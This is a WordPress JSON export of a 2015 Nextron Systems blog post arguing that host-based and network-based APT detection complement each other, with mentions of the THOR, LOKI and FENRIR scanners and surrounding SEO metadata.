{"id":7057,"date":"2015-10-27T20:30:59","date_gmt":"2015-10-27T20:30:59","guid":{"rendered":"https:\/\/www.bsk-consulting.de\/?p=1372"},"modified":"2022-03-25T14:11:59","modified_gmt":"2022-03-25T13:11:59","slug":"synergetic-effects-of-network-and-host-based-apt-detection","status":"publish","type":"post","link":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/","title":{"rendered":"Synergetic Effects of Network and Host Based APT Detection"},"content":{"rendered":"

[et_pb_section fb_built=”1″ admin_label=”section” _builder_version=”3.22″][et_pb_row admin_label=”row” _builder_version=”3.25″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”][et_pb_column type=”4_4″ _builder_version=”3.25″ custom_padding=”|||” custom_padding__hover=”|||”][et_pb_text admin_label=”Text” _builder_version=”4.4.3″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”]People often ask me if they still need our host based scanner THOR now that they have bought a network appliance that already checks all content that goes into and leaves their network. I normally answer that it is not a question of one solution versus another, but a combination of solutions to achieve the best possible result.
\nIt is not difficult to understand that both solutions apply different detection techniques as they analyze different elements and provide different perspectives. It is difficult for an host based solution to detect Zero Day exploits,\u00a0C2 back connects and malicious content in a network connection. But, in the same way it is impossible or difficult for a network based solution to detect system anomalies, malware-less backdoors, web shells and Eventlog or Registry based traces of hacking activities.
\nI collected and composed different\u00a0aspects of advanced persistent threat protection in the following info graphic. The color (grey and aquamarin) indicates the coverage by the different solutions. The graphic is not based on research and may vary in specific cases. It is meant to roughly visualize the different perspectives and high coverage you achieve by combining both solutions.
\n

\"Endpoint

Endpoint APT Detection and Network APT Detection<\/p><\/div>
\nI should add that we currently provide THOR only for a limited group of customers, mainly European corporations, government institutions and certain CSIRTs within the European Union. THOR’s little brother LOKI<\/a> provides a very reduced feature set but may be enough and FENRIR<\/a> is a dependency-less IOC scanner for Unix based target systems written in bash. For a Windows Powershell solution check out Kansa<\/a>\u00a0by Dave Hull. It also allows a distributed scan run using LOKI.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

People often ask me if they still need our host based scanner THOR now that they have bought a network appliance that already checks all content that goes into and leaves their network. I normally answer that it is not a question of one solution versus another, but a combination of solutions to achieve the best possible result. It is not difficult to understand that both solutions apply different detection techniques as they analyze different elements and provide different perspectives. It is difficult for an host based solution to detect Zero Day exploits,\u00a0C2 back connects and malicious content in a network connection. But, in the same way it is impossible or difficult for a network based solution to detect system anomalies, malware-less backdoors, web shells and Eventlog or Registry based traces of hacking activities. I collected and composed different\u00a0aspects of advanced persistent threat protection in the following info graphic. The color (grey and aquamarin) indicates the coverage by the different solutions. The graphic is not based on research and may vary in specific cases. It is meant to roughly visualize the different perspectives and high coverage you achieve by combining both solutions. I should add that we currently provide THOR […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"People often ask me if they still need our host based scanner THOR now that they have bought a network appliance that already checks all content that goes into and leaves their network. I normally answer that it is not a question of one solution versus another, but a combination of solutions to achieve the best possible result.\r\nIt is not difficult to understand that both solutions apply different detection techniques as they analyze different elements and provide different perspectives. It is difficult for an host based solution to detect Zero Day exploits,\u00a0C2 back connects and malicious content in a network connection. But, in the same way it is impossible or difficult for a network based solution to detect system anomalies, malware-less backdoors, web shells and Eventlog or Registry based traces of hacking activities.\r\nI collected and composed different\u00a0aspects of advanced persistent threat protection in the following info graphic. The color (grey and aquamarin) indicates the coverage by the different solutions. The graphic is not based on research and may vary in specific cases. It is meant to roughly visualize the different perspectives and high coverage you achieve by combining both solutions.\r\n[caption id=\"attachment_1373\" align=\"alignnone\" width=\"606\"]\"Endpoint<\/a> Endpoint APT Detection and Network APT Detection[\/caption]\r\nI should add that we currently provide THOR only for a limited group of customers, mainly European corporations, government institutions and certain CSIRTs within the European Union. THOR's little brother LOKI<\/a> provides a very reduced feature set but may be enough and FENRIR<\/a> is a dependency-less IOC scanner for Unix based target systems written in bash. For a Windows Powershell solution check out Kansa<\/a>\u00a0by Dave Hull. It also allows a distributed scan run using LOKI.","_et_gb_content_width":"","footnotes":""},"categories":[316,32],"tags":[6,254,133,13,77,521,257,522,523,82,318,117,7],"class_list":["post-7057","post","type-post","status-publish","format-standard","hentry","category-apt","category-thor","tag-apt","tag-attacker","tag-detect","tag-detection","tag-endpoint","tag-endpoints","tag-hacker","tag-host-based","tag-indicators","tag-ioc","tag-network","tag-scan","tag-scanner"],"yoast_head":"\nSynergetic Effects of Network and Host Based APT Detection - Nextron Systems<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\"},\"author\":{\"name\":\"Florian Roth\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919\"},\"headline\":\"Synergetic Effects of Network and Host Based APT Detection\",\"datePublished\":\"2015-10-27T20:30:59+00:00\",\"dateModified\":\"2022-03-25T13:11:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\"},\"wordCount\":363,\"publisher\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\"},\"keywords\":[\"apt\",\"attacker\",\"detect\",\"detection\",\"endpoint\",\"endpoints\",\"Hacker\",\"host-based\",\"indicators\",\"ioc\",\"network\",\"scan\",\"scanner\"],\"articleSection\":[\"APT\",\"THOR\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\",\"url\":\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\",\"name\":\"Synergetic Effects of Network and Host Based APT Detection - Nextron Systems\",\"isPartOf\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#website\"},\"datePublished\":\"2015-10-27T20:30:59+00:00\",\"dateModified\":\"2022-03-25T13:11:59+00:00\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.nextron-systems.com\/#website\",\"url\":\"https:\/\/www.nextron-systems.com\/\",\"name\":\"Nextron Systems\",\"description\":\"We Detect Hackers\",\"publisher\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.nextron-systems.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.nextron-systems.com\/#organization\",\"name\":\"Nextron Systems GmbH\",\"url\":\"https:\/\/www.nextron-systems.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png\",\"contentUrl\":\"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png\",\"width\":260,\"height\":260,\"caption\":\"Nextron Systems GmbH\"},\"image\":{\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919\",\"name\":\"Florian Roth\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.nextron-systems.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g\",\"caption\":\"Florian Roth\"},\"description\":\"Florian Roth serves as the Head of Research and Development at Nextron Systems. With a background in IT security since 2000, he has delved deep into nation-state cyber attacks since 2012. Florian has developed the THOR Scanner and actively engages with the community via his Twitter handle @cyb3rops. He has contributed to open-source projects, including 'Sigma', a generic SIEM rule format, and 'LOKI', an open-source scanner. Additionally, he has shared valuable resources like a mapping of APT groups and operations and an Antivirus Event Analysis Cheat Sheet.\",\"url\":\"https:\/\/www.nextron-systems.com\/author\/florian\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Synergetic Effects of Network and Host Based APT Detection - Nextron Systems","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/#article","isPartOf":{"@id":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/"},"author":{"name":"Florian Roth","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919"},"headline":"Synergetic Effects of Network and Host Based APT Detection","datePublished":"2015-10-27T20:30:59+00:00","dateModified":"2022-03-25T13:11:59+00:00","mainEntityOfPage":{"@id":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/"},"wordCount":363,"publisher":{"@id":"https:\/\/www.nextron-systems.com\/#organization"},"keywords":["apt","attacker","detect","detection","endpoint","endpoints","Hacker","host-based","indicators","ioc","network","scan","scanner"],"articleSection":["APT","THOR"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/","url":"https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/","name":"Synergetic Effects of Network and Host Based APT Detection - Nextron Systems","isPartOf":{"@id":"https:\/\/www.nextron-systems.com\/#website"},"datePublished":"2015-10-27T20:30:59+00:00","dateModified":"2022-03-25T13:11:59+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.nextron-systems.com\/2015\/10\/27\/synergetic-effects-of-network-and-host-based-apt-detection\/"]}]},{"@type":"WebSite","@id":"https:\/\/www.nextron-systems.com\/#website","url":"https:\/\/www.nextron-systems.com\/","name":"Nextron Systems","description":"We Detect Hackers","publisher":{"@id":"https:\/\/www.nextron-systems.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.nextron-systems.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.nextron-systems.com\/#organization","name":"Nextron Systems GmbH","url":"https:\/\/www.nextron-systems.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png","contentUrl":"https:\/\/www.nextron-systems.com\/wp-content\/uploads\/2017\/11\/Nextron_0.2s_inv_symbol_only.png","width":260,"height":260,"caption":"Nextron Systems GmbH"},"image":{"@id":"https:\/\/www.nextron-systems.com\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/4fd503007d60aabaf1ae747502f36919","name":"Florian Roth","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.nextron-systems.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dfaa838ce5d82e2e7bfa75ed3f43ae5?s=96&d=mm&r=g","caption":"Florian Roth"},"description":"Florian Roth serves as the Head of Research and Development at Nextron Systems. With a background in IT security since 2000, he has delved deep into nation-state cyber attacks since 2012. Florian has developed the THOR Scanner and actively engages with the community via his Twitter handle @cyb3rops. He has contributed to open-source projects, including 'Sigma', a generic SIEM rule format, and 'LOKI', an open-source scanner. Additionally, he has shared valuable resources like a mapping of APT groups and operations and an Antivirus Event Analysis Cheat Sheet.","url":"https:\/\/www.nextron-systems.com\/author\/florian\/"}]}},"_links":{"self":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/7057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/comments?post=7057"}],"version-history":[{"count":4,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/7057\/revisions"}],"predecessor-version":[{"id":7482,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/posts\/7057\/revisions\/7482"}],"wp:attachment":[{"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/media?parent=7057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/categories?post=7057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nextron-systems.com\/wp-json\/wp\/v2\/tags?post=7057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}